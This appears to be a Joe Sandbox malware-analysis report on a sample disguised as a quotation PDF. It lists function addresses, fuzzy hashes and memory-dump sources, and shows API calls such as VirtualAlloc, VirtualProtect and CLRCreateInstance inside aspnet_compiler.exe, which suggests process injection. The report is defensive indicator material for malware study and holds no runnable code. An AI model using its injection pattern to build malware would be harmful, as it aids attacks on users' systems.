Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78ba0454880319462d650527f02986fac9ad45d149a50410afb5eff28d4e8de8
Instruction ID: e42a71e48dbbb8b122620c33bf90052ac8093c7dc20776369972bffad4aa8d1c
Opcode Fuzzy Hash: 78ba0454880319462d650527f02986fac9ad45d149a50410afb5eff28d4e8de8
Instruction Fuzzy Hash: 4FA1B22681D69A5AD712FBBCE4513ED7FB0AF03268B1C41B7D48C8A093DD1C7489C697

Function 00007FF887AF956F Relevance: 5.5, Strings: 4, Instructions: 454COMMON

Download Yara Rule

Strings

"9f, xrefs: 00007FF887AF961C
b4f, xrefs: 00007FF887AF97A3
r6f, xrefs: 00007FF887AF9715
r6f, xrefs: 00007FF887AF973D

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: "9f$b4f$r6f$r6f
API String ID: 0-2012692406
Opcode ID: eb60b4b894070b5abb307bbcae846a0d76fca491bafd0ab0f49ece01e0be57f3
Instruction ID: 8339464a36aa77e54a3e75c91e8e9fe0be8dc23a74eb8c219d0d1bce380755f8
Opcode Fuzzy Hash: eb60b4b894070b5abb307bbcae846a0d76fca491bafd0ab0f49ece01e0be57f3
Instruction Fuzzy Hash: 17F17E7194D68D8FE75ADBA888297EC7FF0EF66354F1400FAC049DB2A2DA681845C712

Function 00007FF887CDA85F Relevance: 5.1, Strings: 4, Instructions: 102COMMON

Download Yara Rule

Strings

hyp, xrefs: 00007FF887CDA881
hyp, xrefs: 00007FF887CDA90B
hyp, xrefs: 00007FF887CDA8AF
hyp, xrefs: 00007FF887CDA8DD

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: hyp$hyp$hyp$hyp
API String ID: 0-3074516007
Opcode ID: 52cde5c100f16a7bffa16abfe62dc7c8af8c8d88d349082f761cb56df6ab5512
Instruction ID: ce80dd16d60dcc82e58ab5b0437121fab966ff275ffa8794ac1f1ddf8d2d4801
Opcode Fuzzy Hash: 52cde5c100f16a7bffa16abfe62dc7c8af8c8d88d349082f761cb56df6ab5512
Instruction Fuzzy Hash: A721FF61F58C498FAAA9A27C542D37D56E3FBD87907580179D01FC32C6DE289C139342

Function 00007FF887CD7400 Relevance: 5.1, Strings: 4, Instructions: 68COMMON

Download Yara Rule

Strings

}h, xrefs: 00007FF887CD744B
}h, xrefs: 00007FF887CD7418
}h, xrefs: 00007FF887CD7405
}h, xrefs: 00007FF887CD745E

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: }h$ }h$ }h$ }h
API String ID: 0-2194325355
Opcode ID: b58550fb6fbf795e4e2cdbeac31479a15afb684af2c5f7eccea8de6e9e8f7a35
Instruction ID: 226c1be5acb72fbdc219c50f83b48dad3f1677f2bd07b0929f26a98b693aeee7
Opcode Fuzzy Hash: b58550fb6fbf795e4e2cdbeac31479a15afb684af2c5f7eccea8de6e9e8f7a35
Instruction Fuzzy Hash: 38110820E8CA495FD7B25E38A8451793FF3FB99340B4805B9C05DCB287CD25A802C742

Analysis Process: aspnet_compiler.exePID: 7848, Parent PID: 7264COMMON

Execution Graph

Execution Coverage:	18.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	89
Total number of Limit Nodes:	4

Executed Functions

Function 00007FF887BD9E4D Relevance: 2.8, Strings: 2, Instructions: 273
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6f, xrefs: 00007FF887BD9E9F
b4f, xrefs: 00007FF887BD9FD4

Memory Dump Source

Source File: 00000005.00000002.2660191344.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887bd0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: b4f$r6f
API String ID: 0-3948239926
Opcode ID: 842ce0c2836e45bdf207734999275f701f4eab7e66a80bb567dc8a43ae1fe4be
Instruction ID: 001ef780954f2f65529058fc17aa6aa45bc0d04d13fa4776c25845b9c8643017
Opcode Fuzzy Hash: 842ce0c2836e45bdf207734999275f701f4eab7e66a80bb567dc8a43ae1fe4be
Instruction Fuzzy Hash: 85A1057091860A8EEB98EF58C454BEDBBB2FF59340F104279D01DE3292CB78A985CB41

Function 000001AE692C2B9C Relevance: 1.6, APIs: 1, Instructions: 382memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 000001AE692C2C0F

Memory Dump Source

Source File: 00000005.00000002.2656855245.000001AE692A0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001AE692A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1ae692a0000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 08c3b473a1f7362871bcf2729fe2c144e163769adb635b581bed10db9dac86c4
Instruction ID: 61f684a4d3f1984477f6412396e69f6d794af826ddf58ec3dd481270ae51358e
Opcode Fuzzy Hash: 08c3b473a1f7362871bcf2729fe2c144e163769adb635b581bed10db9dac86c4
Instruction Fuzzy Hash: 83C19970315905CBEBD9EA2CE4857EAB3D1FBB9301F145969E44EC3286DF20E943C682

Function 00007FF887BD99B0 Relevance: .3, Instructions: 255COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2660191344.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887bd0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f75e4cce712a5dfba672ea952274c2c8bddc95e712e0cb93fd27b03e16a7ab4
Instruction ID: c796c0787db4a5a50af170aeb84400d92b0384730f43c8ff905d1192f1340ae9
Opcode Fuzzy Hash: 0f75e4cce712a5dfba672ea952274c2c8bddc95e712e0cb93fd27b03e16a7ab4
Instruction Fuzzy Hash: 5D912570958A1D9FDB95EF688859BADBBF1FF19340F5001B9D04CE7262DA38A981CF00

Function 00007FF887BDA151 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2660191344.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887bd0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a71e9d5794c0eedfd40f63398aa3c5a2951eab2a89c2c4af4499beca7808e8e
Instruction ID: e264b181c2aa409bb8a360d015613a801dfa6f6c662edeffb2d0c04bfcf3ab61
Opcode Fuzzy Hash: 1a71e9d5794c0eedfd40f63398aa3c5a2951eab2a89c2c4af4499beca7808e8e
Instruction Fuzzy Hash: CB015230C5461A8EEB10EF95C4407FEB6B2FF86341F008139D128A71C6CA796989CF80

Function 000001AE692C1B04 Relevance: 6.1, APIs: 4, Instructions: 133
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000001AE692C43B4: LoadLibraryA.KERNELBASE ref: 000001AE692C4482

VirtualProtect.KERNELBASE ref: 000001AE692C1B80
VirtualProtect.KERNELBASE ref: 000001AE692C1BA9
VirtualProtect.KERNELBASE ref: 000001AE692C1BEE
VirtualProtect.KERNELBASE ref: 000001AE692C1C12

Memory Dump Source

Source File: 00000005.00000002.2656855245.000001AE692A0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001AE692A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1ae692a0000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: d24d4ce7223a552c1b01d238479d20a295a89e3d53a7350efd5ba8d12bfb46a0
Instruction ID: e6d4598c2c900ddf84d000510dacf528d4e8a5036ab412f893e5568e9fb1ff42
Opcode Fuzzy Hash: d24d4ce7223a552c1b01d238479d20a295a89e3d53a7350efd5ba8d12bfb46a0
Instruction Fuzzy Hash: 4C31763171CA088BD798AE1CAC867EA73D5E7E9721F100669F84FC32C6DD60DD4646C2

Function 000001AE692C1B73 Relevance: 6.1, APIs: 4, Instructions: 89
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 000001AE692C1B80
VirtualProtect.KERNELBASE ref: 000001AE692C1BA9
VirtualProtect.KERNELBASE ref: 000001AE692C1BEE
VirtualProtect.KERNELBASE ref: 000001AE692C1C12

Memory Dump Source

Source File: 00000005.00000002.2656855245.000001AE692A0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001AE692A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1ae692a0000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: f2b484dd179f3dd10506a7a62fe75bc60ed010a6cf5ae84582fe1852291c4020
Instruction ID: a69b51365b0b7c96cf8dd14761e537947bccdfdea93152f004be0a58ecfcc3ca
Opcode Fuzzy Hash: f2b484dd179f3dd10506a7a62fe75bc60ed010a6cf5ae84582fe1852291c4020
Instruction Fuzzy Hash: A521663170CA088BDB98A95CB8963E973D1E7E8721F100569FC4FC32C6DD24DD464683

Function 000001AE692C2928 Relevance: 4.8, APIs: 3, Instructions: 257
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CLRCreateInstance.MSCOREE ref: 000001AE692C2974
SysAllocString.OLEAUT32 ref: 000001AE692C2A90
SafeArrayDestroy.OLEAUT32 ref: 000001AE692C2B74

Memory Dump Source

Source File: 00000005.00000002.2656855245.000001AE692A0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001AE692A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1ae692a0000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AllocArrayCreateDestroyInstanceSafeString
String ID:
API String ID: 815377780-0
Opcode ID: dae33ee218254d575b2f885f916d6963ffe40f3360d10ef8a927e24c671039fc
Instruction ID: 0ca347a566791780c85969e59485ec7008180be447d9574026cb9e0fa0d54e23
Opcode Fuzzy Hash: dae33ee218254d575b2f885f916d6963ffe40f3360d10ef8a927e24c671039fc
Instruction Fuzzy Hash: 5C813F30219A088FD7A8EF28D8897E6B7E0FF59301F104A6DE49EC7151DF30E5458B82

Function 00007FF887BD2A17 Relevance: 4.0, Strings: 3, Instructions: 220
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

x\Z, xrefs: 00007FF887BD2BD7
"rf, xrefs: 00007FF887BD2A60
6f, xrefs: 00007FF887BD2A18

Memory Dump Source

Source File: 00000005.00000002.2660191344.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887bd0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: 6f$"rf$x\Z
API String ID: 0-3514380108
Opcode ID: fcbb0b2d4108b393ec6d4411d477b451ba223cb653c641a886c9ab9cddd519b4
Instruction ID: f007ebf7fd7b5b8a738061a497e8bf61a2d85f1b427ff0cd306876cf03125b82
Opcode Fuzzy Hash: fcbb0b2d4108b393ec6d4411d477b451ba223cb653c641a886c9ab9cddd519b4
Instruction Fuzzy Hash: D1811B70918A5D8FDB98EFA8C854BACBBF1FF59340F5441A9D00DE7252CA78A985CB01

Function 000001AE692C43B4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 000001AE692C4482

Strings

l, xrefs: 000001AE692C441C

Memory Dump Source

Source File: 00000005.00000002.2656855245.000001AE692A0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001AE692A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1ae692a0000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: l
API String ID: 1029625771-2517025534
Opcode ID: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
Instruction ID: 6714106fb58b06045346b6d5c451b6ccc1e420c91f4b7098250fa61638d2a7d8
Opcode Fuzzy Hash: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
Instruction Fuzzy Hash: E131853061DA858FE7A5DB2CD044B96BBD5FBAA308F345AACD0DEC7192D720D4468702

Function 000001AE692C1C30 Relevance: 3.1, APIs: 2, Instructions: 63
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000001AE692C43B4: LoadLibraryA.KERNELBASE ref: 000001AE692C4482

VirtualProtect.KERNELBASE ref: 000001AE692C1C7E
VirtualProtect.KERNELBASE ref: 000001AE692C1CA6

Memory Dump Source

Source File: 00000005.00000002.2656855245.000001AE692A0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001AE692A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1ae692a0000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: b17c4479f7010fd41cbad95f9fb04bd4be79ef02ed8fc175b75ead6b9ebb131e
Instruction ID: 886616a4967ef9c74810e756b9e0d9f6786c2572bb3ff618df42ec6980cba189
Opcode Fuzzy Hash: b17c4479f7010fd41cbad95f9fb04bd4be79ef02ed8fc175b75ead6b9ebb131e
Instruction Fuzzy Hash: 6C115631718A088BDB95EB1C98C57EA77D5FBE9301F440969F84EC7285DE20DE458782

Function 00007FF887BD3952 Relevance: 2.8, Strings: 2, Instructions: 282
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

"rf, xrefs: 00007FF887BD3A90
x\Z, xrefs: 00007FF887BD3C07

Memory Dump Source

Source File: 00000005.00000002.2660191344.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887bd0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: "rf$x\Z
API String ID: 0-1096995870
Opcode ID: 5392a41065f268b2f9954bea37cc9662f719266356b2f910e47a06bfbc94aa1f
Instruction ID: c8790c66d591a6b0a525de296e109a1de812f955f5b80a3a840bbe33439da542
Opcode Fuzzy Hash: 5392a41065f268b2f9954bea37cc9662f719266356b2f910e47a06bfbc94aa1f
Instruction Fuzzy Hash: D2A15A70908A5D8FEB99DB68C859BACBBF1FF59340F1441FAD04DD7292CA389985CB01

Function 00007FF887BD31EC Relevance: 2.7, Strings: 2, Instructions: 232
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

x\Z, xrefs: 00007FF887BD33E7
"rf, xrefs: 00007FF887BD3270

Memory Dump Source

Source File: 00000005.00000002.2660191344.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887bd0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: "rf$x\Z
API String ID: 0-1096995870
Opcode ID: fbf680862eb3687b774fdbb82235b1c5320fd855b6d72934845366e4525ec678
Instruction ID: bbdad11d6010bc3557731ab0e617ea7fc1faa9e0dfa9bae4eab055d0db993e93
Opcode Fuzzy Hash: fbf680862eb3687b774fdbb82235b1c5320fd855b6d72934845366e4525ec678
Instruction Fuzzy Hash: 72813B70908A5C8FEB95EB68C859BADBBF1FF59310F1441FAD00ED7252CA74A985CB01

Function 00007FF887BD35FC Relevance: 2.7, Strings: 2, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

"rf, xrefs: 00007FF887BD3680
x\Z, xrefs: 00007FF887BD37F7

Memory Dump Source

Source File: 00000005.00000002.2660191344.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887bd0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: "rf$x\Z
API String ID: 0-1096995870
Opcode ID: be85b78f029d4536c6cbe74e3e67d7caa877cfa3f20b775cd17c63b5c06c9ea8
Instruction ID: 761f18e7373088495698444b35673b0299161d988319797193f9ad46c395cf40
Opcode Fuzzy Hash: be85b78f029d4536c6cbe74e3e67d7caa877cfa3f20b775cd17c63b5c06c9ea8
Instruction Fuzzy Hash: DE813EB0908A5DCFDB94EB68C859BADBBF1FF59340F5040E9D04ED7252CA35A985CB01

Function 00007FF887BD4A55 Relevance: 2.7, Strings: 2, Instructions: 224
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

"rf, xrefs: 00007FF887BD4AD0
x\Z, xrefs: 00007FF887BD4C47

Memory Dump Source

Source File: 00000005.00000002.2660191344.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887bd0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: "rf$x\Z
API String ID: 0-1096995870
Opcode ID: f6583d3531d8247c6990906e6d231e8e4f3c77f8120d548c361dfe1abbd93dc9
Instruction ID: 56472c9211f0e3faad697feb65b0aec6489835e18074d1615e05d0b20a1090e3
Opcode Fuzzy Hash: f6583d3531d8247c6990906e6d231e8e4f3c77f8120d548c361dfe1abbd93dc9
Instruction Fuzzy Hash: 8F812C70908A5C8FDB98EB68C459BADBBF1FF69310F5441EAD00DD7252CB34A985CB01

Function 00007FF887BD422C Relevance: 2.7, Strings: 2, Instructions: 210
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

x\Z, xrefs: 00007FF887BD4427
"rf, xrefs: 00007FF887BD42B0

Memory Dump Source

Source File: 00000005.00000002.2660191344.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887bd0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: "rf$x\Z
API String ID: 0-1096995870
Opcode ID: 2d349625188a4d87ee1eb5e5ba87ac6e3807d0b192ff0178a59d4a6bd1a7aa1d
Instruction ID: c99c36f3c9cedaec77ef3859cb94b9e4e0c5b70bf7e85ab8afe43eb3161b92e5
Opcode Fuzzy Hash: 2d349625188a4d87ee1eb5e5ba87ac6e3807d0b192ff0178a59d4a6bd1a7aa1d
Instruction Fuzzy Hash: 92713970908A5C8FDB98DB68C859BADBBF1FF59350F5041BEC04ED7292CA74A985CB01

Function 00007FF887BD3E21 Relevance: 2.7, Strings: 2, Instructions: 208
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

"rf, xrefs: 00007FF887BD3EA0
x\Z, xrefs: 00007FF887BD4017

Memory Dump Source

Source File: 00000005.00000002.2660191344.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887bd0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: "rf$x\Z
API String ID: 0-1096995870
Opcode ID: 25d2e6d01c6b6c7d0713f1380f318b738c8876f0949d7e08c8177cfdd9acf074
Instruction ID: cc57d8cbe446383d720c770b77888a841cb4b6220549540b87f7d250a537bd27
Opcode Fuzzy Hash: 25d2e6d01c6b6c7d0713f1380f318b738c8876f0949d7e08c8177cfdd9acf074
Instruction Fuzzy Hash: 37713B7090865D9FDB98EB68C855BADBBF2FF59340F5040BAC04ED7292CA386985CB01

Function 00007FF887BD4645 Relevance: 2.7, Strings: 2, Instructions: 207
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

x\Z, xrefs: 00007FF887BD4837
"rf, xrefs: 00007FF887BD46C0

Memory Dump Source

Source File: 00000005.00000002.2660191344.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887bd0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: "rf$x\Z
API String ID: 0-1096995870
Opcode ID: 195dde8e32c40d1b5e30b2ac0b05277c8e5ee2ab9beee8e3130f3f3300b545e3
Instruction ID: 273a49b97c7ca0997dd57f81383b3dbff6edf635d11a5cf034faaafab0ceb11a
Opcode Fuzzy Hash: 195dde8e32c40d1b5e30b2ac0b05277c8e5ee2ab9beee8e3130f3f3300b545e3
Instruction Fuzzy Hash: BD712B70908A5C8FDB98DB68C859BADBBF2FF59350F5041EAC04ED7292CA355985CB01

Function 00007FF887BD4A87 Relevance: 2.7, Strings: 2, Instructions: 162COMMON

Download Yara Rule

Strings

6f, xrefs: 00007FF887BD4A88
"rf, xrefs: 00007FF887BD4AD0

Memory Dump Source

Source File: 00000005.00000002.2660191344.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887bd0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: 6f$"rf
API String ID: 0-4066590180
Opcode ID: 290effaa79e3a6fdbcb89070c7798788835fd58695e9c86e668a5a5dac3e57fa
Instruction ID: 10ad5adfbda409dfe940396aa3ee11f36cc54bffa8574b9190b3547f8d0d5b07
Opcode Fuzzy Hash: 290effaa79e3a6fdbcb89070c7798788835fd58695e9c86e668a5a5dac3e57fa
Instruction Fuzzy Hash: 56513A70D18A5D8FDB98DB68C855BADBBF2FF59310F4441BAD04DD7292CA38A980CB01

Function 00007FF887BD3A47 Relevance: 2.7, Strings: 2, Instructions: 162COMMON

Download Yara Rule

Strings

"rf, xrefs: 00007FF887BD3A90
6f, xrefs: 00007FF887BD3A48

Memory Dump Source

Source File: 00000005.00000002.2660191344.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887bd0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: 6f$"rf
API String ID: 0-4066590180
Opcode ID: 1662f9843bbd35307191bc92af61d8ae16d1bc4232b31888cb69ee6760413eb1
Instruction ID: 371336809b9b305787d9156a160965560c2d231f1ad492776cad0b5605397ca3
Opcode Fuzzy Hash: 1662f9843bbd35307191bc92af61d8ae16d1bc4232b31888cb69ee6760413eb1
Instruction Fuzzy Hash: 2A512B70D18A5D8FEB98DB68C855BADBBF2FF59340F4441B9D04DD7292CA386980CB01

Function 00007FF887BD3E57 Relevance: 2.7, Strings: 2, Instructions: 162COMMON

Download Yara Rule

Strings

6f, xrefs: 00007FF887BD3E58
"rf, xrefs: 00007FF887BD3EA0

Memory Dump Source

Source File: 00000005.00000002.2660191344.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887bd0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: 6f$"rf
API String ID: 0-4066590180
Opcode ID: fe1ad86ab409764884176fee4488681b5fe1ab4047d59b8a6906cb19a7a2a1c8
Instruction ID: 51d1456a305d21ed6119cd9c9428ac3f748ce858316f12659dcba3c756066c28
Opcode Fuzzy Hash: fe1ad86ab409764884176fee4488681b5fe1ab4047d59b8a6906cb19a7a2a1c8
Instruction Fuzzy Hash: 08513A70D08A5D8FDB98EB68C855BADBBF2FF59340F4040B9D04DE7292CA386984CB01

Function 00007FF887BD4267 Relevance: 2.7, Strings: 2, Instructions: 162COMMON

Download Yara Rule

Strings

"rf, xrefs: 00007FF887BD42B0
6f, xrefs: 00007FF887BD4268

Memory Dump Source

Source File: 00000005.00000002.2660191344.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887bd0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: 6f$"rf
API String ID: 0-4066590180
Opcode ID: aa0abdd22f33fd8ba10f101bd0f48a9da70efc17c225c005c4b5729c63d685c5
Instruction ID: f49a911bcd837af19a775f750f886be86222dc5573ce9ce031be0dfe725fd4f5
Opcode Fuzzy Hash: aa0abdd22f33fd8ba10f101bd0f48a9da70efc17c225c005c4b5729c63d685c5
Instruction Fuzzy Hash: 8E513A70918A5D8FDB98DB688855BADBBF2FF59350F4041BAD04DD7292CB38A984CB01

Function 00007FF887BD4677 Relevance: 2.7, Strings: 2, Instructions: 162COMMON

Download Yara Rule

Strings

6f, xrefs: 00007FF887BD4678
"rf, xrefs: 00007FF887BD46C0

Memory Dump Source

Source File: 00000005.00000002.2660191344.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887bd0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: 6f$"rf
API String ID: 0-4066590180
Opcode ID: 3cd047657dddd739573c6ee89d4e2cc56713ab9bd94a4d786d2a2b516194bcde
Instruction ID: 8387c4075f5a3b102ef0112206f9abacf4555148f6a8e97a6b884465801f2ab9
Opcode Fuzzy Hash: 3cd047657dddd739573c6ee89d4e2cc56713ab9bd94a4d786d2a2b516194bcde
Instruction Fuzzy Hash: 03512970D08A5D8FDB98DB68C859BADBBF2FF59350F4041B9D04DE7292CA396984CB01

Function 00007FF887BD3227 Relevance: 2.7, Strings: 2, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

"rf, xrefs: 00007FF887BD3270
6f, xrefs: 00007FF887BD3228

Memory Dump Source

Source File: 00000005.00000002.2660191344.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887bd0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: 6f$"rf
API String ID: 0-4066590180
Opcode ID: fe94ce3a8d650cb4bfd9f478242105e26c63588989f20974e52437bde03f3fae
Instruction ID: 98de7613b3d0eb98f7c58c226bb3b8fb64c868d4ee838b1b79c8f4d454501498
Opcode Fuzzy Hash: fe94ce3a8d650cb4bfd9f478242105e26c63588989f20974e52437bde03f3fae
Instruction Fuzzy Hash: 87512B70D18A5D8FEB98EB68C855BADBBF2FF59340F4441B9D04DD7292CA786980CB01

Function 00007FF887BD3637 Relevance: 2.7, Strings: 2, Instructions: 162COMMON

Download Yara Rule

Strings

"rf, xrefs: 00007FF887BD3680
6f, xrefs: 00007FF887BD3638

Memory Dump Source

Source File: 00000005.00000002.2660191344.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887bd0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: 6f$"rf
API String ID: 0-4066590180
Opcode ID: 7719baad491e9134b67f0054a32932e6376dce0c04cdceaec355ca2d44efb74c
Instruction ID: 22ea6da96fe9652aa2a233b4f7072c4f42215fdb806bbb786a4cac8ae85e261e
Opcode Fuzzy Hash: 7719baad491e9134b67f0054a32932e6376dce0c04cdceaec355ca2d44efb74c
Instruction Fuzzy Hash: 32511970D08A5D8FEB98DB68C855BADBBF2FF59340F4441B9D04DD7292CA39A980CB01

Function 00007FF887BD6091 Relevance: 2.6, Strings: 2, Instructions: 120COMMON

Download Yara Rule

Strings

r6f, xrefs: 00007FF887BD6122
r6f, xrefs: 00007FF887BD60D7

Memory Dump Source

Source File: 00000005.00000002.2660191344.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887bd0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: r6f$r6f
API String ID: 0-3010028659
Opcode ID: d64a87f4d5d1a1c3a318ddf33280e589c2c414b2e5ee146aa561320c2b68fd7f
Instruction ID: 7d1d528e8cd61cf5773c2a3cd2960d9c30c250e1e0abfeeb027bc7d52abb8611
Opcode Fuzzy Hash: d64a87f4d5d1a1c3a318ddf33280e589c2c414b2e5ee146aa561320c2b68fd7f
Instruction Fuzzy Hash: 1531F53094864A9FE7459BA8D8297EDBBF1FF463A0F4541BAC008C71D3EA6C2845CB91

Function 00007FF887BD5228 Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

